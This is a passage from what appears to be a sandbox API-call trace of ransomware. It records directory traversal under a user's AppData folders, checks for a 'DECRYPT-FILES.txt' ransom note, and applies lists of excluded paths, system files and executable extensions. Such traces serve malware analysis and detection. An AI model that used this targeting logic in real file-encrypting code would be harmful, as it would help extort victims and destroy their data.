halpmcxz\\appdata\\roaming\\microsoft\\word\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.475] CloseHandle (hObject=0x0) returned 0 [0182.475] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.475] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac324420, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac324420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac324420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0182.475] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0182.475] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27c7d150, ftCreationTime.dwHighDateTime=0x1d3aaba, ftLastAccessTime.dwLowDateTime=0xac324420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac324420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="STARTUP", cAlternateFileName="")) returned 1 [0182.475] lstrcmpW (lpString1="STARTUP", lpString2=".") returned 1 [0182.475] lstrcmpW (lpString1="STARTUP", lpString2="..") returned 1 [0182.475] lstrcatW (in: lpString1="STARTUP", lpString2="\\" | out: lpString1="STARTUP\\") returned="STARTUP\\" [0182.475] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\", lpString2="STARTUP\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\" [0182.475] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpSrch="\\Program Files") returned 0x0 [0182.475] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpSrch=":\\Windows") returned 0x0 [0182.475] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpSrch="\\Games\\") returned 0x0 [0182.476] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpSrch="\\Tor Browser\\") returned 0x0 [0182.476] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpSrch="\\ProgramData\\") returned 0x0 [0182.476] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0182.476] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0182.476] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0182.476] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpSrch="\\All Users") returned 0x0 [0182.476] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpSrch="\\IETldCache\\") returned 0x0 [0182.476] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpSrch="\\Local Settings\\") returned 0x0 [0182.476] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpSrch="\\AppData\\Local") returned 0x0 [0182.476] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpSrch="AhnLab") returned 0x0 [0182.476] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0182.476] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\") returned 69 [0182.476] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.476] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\\\0a16c9.tmp") returned 80 [0182.476] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\word\\startup\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x274 [0182.476] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\") returned 69 [0182.476] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0182.476] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\\\DECRYPT-FILES.txt") returned 87 [0182.477] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\word\\startup\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.502] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\") returned 69 [0182.503] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*" [0182.503] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27c7d150, ftCreationTime.dwHighDateTime=0x1d3aaba, ftLastAccessTime.dwLowDateTime=0xefc8f080, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefc8f080, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0182.503] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0182.503] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27c7d150, ftCreationTime.dwHighDateTime=0x1d3aaba, ftLastAccessTime.dwLowDateTime=0xefc8f080, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefc8f080, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.503] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0182.503] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0182.503] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xefc8f080, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xefc8f080, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefc8f080, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0182.503] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0182.503] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0182.503] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0182.503] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0182.503] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0182.503] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0182.503] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0182.503] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0182.503] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0182.503] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0182.503] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.503] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0182.503] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0182.503] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0182.503] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0182.503] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\") returned 69 [0182.503] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.503] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\" [0182.503] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\0a16c9.tmp" [0182.503] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.504] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\word\\startup\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.504] CloseHandle (hObject=0x0) returned 0 [0182.504] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.504] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac324420, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac324420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac34a580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0182.504] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0182.504] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac324420, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac324420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac34a580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0182.504] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0182.504] CloseHandle (hObject=0x274) returned 1 [0182.504] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27c7d150, ftCreationTime.dwHighDateTime=0x1d3aaba, ftLastAccessTime.dwLowDateTime=0xac324420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac324420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="STARTUP\\", cAlternateFileName="")) returned 0 [0182.505] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0182.505] CloseHandle (hObject=0x26c) returned 1 [0182.505] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f71aa70, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xac324420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac324420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Word\\", cAlternateFileName="")) returned 0 [0182.505] FindClose (in: hFindFile=0x4798f8 | out: hFindFile=0x4798f8) returned 1 [0182.506] CloseHandle (hObject=0x264) returned 1 [0182.506] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xac34a580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac34a580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0182.506] lstrcmpW (lpString1="Mozilla", lpString2=".") returned 1 [0182.506] lstrcmpW (lpString1="Mozilla", lpString2="..") returned 1 [0182.506] lstrcatW (in: lpString1="Mozilla", lpString2="\\" | out: lpString1="Mozilla\\") returned="Mozilla\\" [0182.506] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="Mozilla\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\" [0182.506] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\", lpSrch="\\Program Files") returned 0x0 [0182.506] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\", lpSrch=":\\Windows") returned 0x0 [0182.506] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\", lpSrch="\\Games\\") returned 0x0 [0182.506] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\", lpSrch="\\Tor Browser\\") returned 0x0 [0182.506] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\", lpSrch="\\ProgramData\\") returned 0x0 [0182.506] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0182.506] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0182.506] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0182.506] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\", lpSrch="\\All Users") returned 0x0 [0182.506] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\", lpSrch="\\IETldCache\\") returned 0x0 [0182.506] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\", lpSrch="\\Local Settings\\") returned 0x0 [0182.506] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\", lpSrch="\\AppData\\Local") returned 0x0 [0182.506] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\", lpSrch="AhnLab") returned 0x0 [0182.506] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0182.506] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\") returned 54 [0182.506] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.506] wsprintfW (in: param_1=0x36fe7f0, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\\\0a16c9.tmp") returned 65 [0182.507] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x264 [0182.664] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\") returned 54 [0182.664] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0182.664] wsprintfW (in: param_1=0x36fe7f0, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\\\DECRYPT-FILES.txt") returned 72 [0182.664] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.664] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\") returned 54 [0182.664] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\*" [0182.664] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\*", lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xefe58100, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefe58100, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798f8 [0182.665] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0182.665] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xefe58100, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefe58100, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.665] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0182.665] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0182.665] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xefe58100, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xefe58100, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefe58100, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0182.665] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0182.665] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0182.665] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0182.665] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0182.665] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0182.665] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0182.665] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0182.665] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0182.665] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0182.665] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0182.665] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.665] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0182.665] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0182.665] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0182.665] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0182.666] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\") returned 54 [0182.666] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.666] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\" [0182.666] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\0a16c9.tmp" [0182.666] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.666] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.666] CloseHandle (hObject=0x0) returned 0 [0182.666] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.666] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac34a580, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac34a580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac34a580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0182.666] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0182.666] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb458e750, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xac34a580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac34a580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Extensions", cAlternateFileName="EXTENS~1")) returned 1 [0182.666] lstrcmpW (lpString1="Extensions", lpString2=".") returned 1 [0182.666] lstrcmpW (lpString1="Extensions", lpString2="..") returned 1 [0182.666] lstrcatW (in: lpString1="Extensions", lpString2="\\" | out: lpString1="Extensions\\") returned="Extensions\\" [0182.666] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\", lpString2="Extensions\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\" [0182.666] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\", lpSrch="\\Program Files") returned 0x0 [0182.667] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\", lpSrch=":\\Windows") returned 0x0 [0182.667] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS 